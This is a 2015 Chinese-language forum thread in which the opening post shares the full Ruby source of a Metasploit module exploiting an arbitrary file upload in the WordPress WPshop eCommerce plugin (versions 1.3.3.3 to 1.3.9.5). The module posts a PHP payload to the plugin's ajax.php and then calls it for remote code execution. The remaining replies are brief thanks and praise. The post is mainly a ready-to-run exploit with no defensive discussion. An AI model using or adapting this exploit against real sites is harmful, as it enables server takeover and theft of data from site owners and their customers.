90_ 发表于 2015-4-25 19:13:26

WordPress eCommerce 1.3.9.5上传漏洞

说明:
This Metasploit module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin versions 1.3.3.3 to 1.3.9.5. It allows you to upload arbitrary PHP code and get remote code execution. This Metasploit module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
        from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
        code execution. This module has been tested successfully on WordPress WPshop eCommerce
        1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
      },
      'Author'         =>
        [
          'g0blin', # Vulnerability Discovery, initial msf module
          'Roberto Soares Espreto <robertoespretogmail.com>'  # Metasploit Module Pull Request
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '7830'],
          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['WPshop eCommerce 1.3.9.5', {}]],
      'DisclosureDate' => 'Mar 09 2015',
      'DefaultTarget'  => 0)
    )
  end
 
  def check
    check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
  end
 
  def exploit
    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
 
    data = Rex::MIME::Message.new
    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s
 
    res = send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    )
 
    if res
      if res.code == 200 && res.body =~ /#{php_page_name}/
        print_good("#{peer} - Payload uploaded as #{php_page_name}")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
    end
 
    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
      5
    )
  end
end
 
  #

a1343868513 发表于 2015-4-25 21:26:45

666666666,论坛人气还不如以前08sec

yusiii 发表于 2015-6-28 18:14:05

支持,看起来不错呢!

admin1964 发表于 2015-6-28 19:53:54

学习学习技术,加油!

wtsqq123 发表于 2015-6-29 00:28:16

感谢楼主的分享~

菜鸟小羽 发表于 2015-6-29 07:12:19

还是不错的哦,顶了

wilist 发表于 2015-6-29 15:00:01

还是不错的哦,顶了

a136 发表于 2015-6-30 03:21:36

还是不错的哦,顶了

08-wh 发表于 2015-6-30 03:39:48

还是不错的哦,顶了

r00tc4 发表于 2015-7-1 02:42:14

支持,看起来不错呢!
页: [1]
查看完整版本: WordPress eCommerce 1.3.9.5上传漏洞